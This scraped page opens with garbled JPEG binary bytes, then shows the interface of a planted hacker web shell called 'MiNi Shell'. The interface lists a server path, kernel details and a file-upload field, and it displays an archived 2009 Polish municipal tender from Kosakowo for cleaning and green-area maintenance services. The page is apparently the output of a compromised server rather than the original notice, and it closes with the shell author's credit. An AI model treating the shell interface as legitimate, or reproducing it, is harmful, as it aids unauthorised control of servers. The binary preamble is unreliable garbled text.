JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090218/32908-N-2009.html

<p class="kh_header"><b>Kosakowo: UTRZYMANIE CZYSTOŚCI I PORZĄDKU NA TERENACH GMINNYCH, GM. KOSAKOWO</b><br>
<b>Numer ogłoszenia: 32908 - 2009; data zamieszczenia: 18.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd  Gminy , ul. Żeromskiego 69, 81-198 Kosakowo, woj. pomorskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> kosakowo@zgwrp.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> UTRZYMANIE CZYSTOŚCI I PORZĄDKU NA TERENACH GMINNYCH, GM. KOSAKOWO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest utrzymanie porządku i czystości na terenach gminnych, gm. Kosakowo wymienionych w załączniku do umowy /zał. Nr 4 do SIWZ/, a w szczególności:
1.	Zorganizowanie w ciągu 14 dni od daty podpisania umowy oraz następnie utrzymanie bazy materiałowo-sprzętowej na terenie Gminy Kosakowo.
2.	Utrzymanie czystości pasa drogowego dróg gminnych oraz gminnych terenów utwardzonych:
   1/ zamiatanie zanieczyszczeń (w tym zbieranie śmieci) z utwardzonych dróg, poboczy, 
   chodników, gminnych terenów oraz wywożenie i utylizacja zanieczyszczeń we 
   własnym zakresie
2/ opróżnianie małych koszy na śmieci (trzy razy w tygodniu: poniedziałek, środa, piątek do godziny 9.00) oraz wywóz śmieci na wysypisko we własnym zakresie
3.	Utrzymanie czystości pasa drogowego dróg gruntowych (do 1.30 m od krawędzi jezdni lub chodnika) - usuwanie zanieczyszczeń z dróg i poboczy oraz wywożenie i zagospodarowywanie zanieczyszczeń we własnym zakresie 
4.	Utrzymanie trawników oraz gminnych terenów zielonych
1/ zbieranie zanieczyszczeń oraz ich zagospodarowywanie we własnym zakresie
      2/ koszenie trawy, jej usuwanie oraz wywożenie i zagospodarowywanie we własnym
      zakresie 5 razy w sezonie wiosenno - letnim tj. od 1 maja do 30 września
5.	Utrzymanie w okresie wiosenno - letnim tj. od 1 czerwca do 30 września zieleni, kwietników i gazonów z kwiatami, rabat:
1/ przygotowanie kwietników, gazonów i rabat do nasadzenia kwiatów w okresie wiosennym oraz ich uprzątnięcie w okresie jesiennym
2/ nasadzenie kwiatów (bratków, pelargonii, begonii, turków - w uzgodnieniu z zamawiającym) w ilości 15000 sztuk, pielęgnacja nasadzonych kwiatów (nawożenie, podlewanie, odchwaszczanie, uzupełnianie do 10% nasadzeń, w razie potrzeby ochrona środkami chemicznymi)
3/ zabezpieczenie 700 sztuk kwiatów do nasadzenia w wybranym przez zamawiającego terminie i miejscu (z 7 dniowym wyprzedzeniem)
4/ przycinanie suchych gałęzi oraz odrostów drzew i krzaków (na terenach gminnych i w pasie drogowym dróg gminnych) i zagospodarowywanie odpadów zielonych we własnym zakresie
6.	Utrzymanie czystości i porządku na terenach przyplażowych - zbieranie zanieczyszczeń oraz ich zagospodarowywanie we własnym zakresie
7.	Utrzymanie czystości na plażach - sprzątanie plaż raz w tygodniu w okresie od 
1 października do 31 maja w dzień tygodnia wskazany przez zamawiającego.
8.	Likwidacja nielegalnych wysypisk śmieci (do 2 m3) powstałych od momentu podpisania umowy 
9.	Utrzymanie wiat przystankowych - mycie wiat przystankowych (raz w miesiącu)
10.	Usuwanie martwych zwierząt wraz z utylizacją ich w koncesjonowanym zakładzie.
11.	Podejmowanie skutecznych interwencji, w zakresie objętym umową, w terminie 24 h od daty zgłoszenia (wykonawca jest zobowiązany do zapewnienia łączności za pośrednictwem faksu, a w godzinach 8 - 17, za pośrednictwem telefonu komórkowego we wszystkie dni tygodnia).
12.	W przypadku stwierdzenia przez Zamawiającego nieprawidłowości, uczestnictwo w wizji lokalnej na żądanie zamawiającego (w terminie 3 h od zgłoszenia żądania, w dni powszednie w godz. 8-17).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 77.31.00.00-6, 77.31.41.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie następujących warunków:
1.1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  ustawy nakładają obowiązek posiadania takich uprawnień.
1.2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem te4chnicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
1.3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
1.4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.
1.5. Spełniają wymagania określone ustawą Prawo zamówień publicznych oraz niniejszą SIWZ.
1.6. Wykonają zamówienie z należytą starannością. 
1.7. Akceptują postanowienia projektu umowy stanowiącej część dokumentacji przetargowej.
1.8. Złożą ofertę wraz z wymaganymi dokumentami, oświadczeniami, załącznikami oraz zaświadczeniami.

2. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:
2.1 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ustawy Prawo zamówień publicznych 
2.2 podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych.
2.3 wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji.
2.4 złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania. 
2.5 nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych.
2.6. nie zgodzili się na przedłużenie okresu związania ofertą. 

3. Zamawiający odrzuca ofertę, jeżeli:
3.1 jest niezgodna z ustawą lub jej treść nie odpowiada treści niniejszej SIWZ 
3.2 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji 
3.3 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia  
3.4 została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia 
3.5 zawiera oczywiste omyłki pisarskie i rachunkowe oraz inne omyłki polegające na niezgodności oferty z SIWZ, których nie można poprawić na podstawie art. 87 ustawy Prawo zamówień publicznych,  
3.6 Wykonawca w terminie 7 dni od dnia otrzymania zawiadomienia nie zgodził się na poprawienie omyłki rachunkowej w obliczeniu ceny 
3.7 jest nieważna na podstawie odrębnych przepisów, 

4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.

5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wypełniony i podpisany druk Oferta - wg wzoru - załącznik nr 1
2. Oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie
    zamówienia publicznego - wg wzoru - załącznika nr 2
3. Formularz cenowy - kosztorys ofertowy - załącznik nr 3
4. Parafowany przez Wykonawcę projekt umowy - załącznik nr 4
5. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
    ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do 
    rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie
    wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6. Pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań w imieniu 
    firmy składającej ofertę, o ile nie wynika ono z innych przepisów prawa lub innych
    dokumentów.
7. Wykaz niezbędnego do wykonywania zamówienia sprzętu, osprzętu i składowisk, 
    jakimi dysponuje Wykonawca (wg minimum wymienionego w pkt 1.3) -załącznik nr 5
8. Wykaz osób, które będą wykonywać zamówienie lub będą uczestniczyć w 
    wykonywaniu zamówienia wraz informacjami na temat ich kwalifikacji zawodowych, 
    a także zakresy wykonywanych przez nich czynności - wg załącznika nr 6
    Do wykazu należy dołączyć kopię dokumentu potwierdzającego posiadanie uprawnień
9. Polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest 
    ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
    gospodarczej lub oświadczenie, że w przypadku wygrania przetargu do dnia zawarcia 
    umowy taką polisę zawrze..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.kosakowo.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kosakowo
ul. Żeromskiego 69
81-198 Kosakowo.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2009 godzina 10:00, miejsce: Urząd Gminy Kosakowo, adres j.w. Biuro Obsługi Interesanta.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com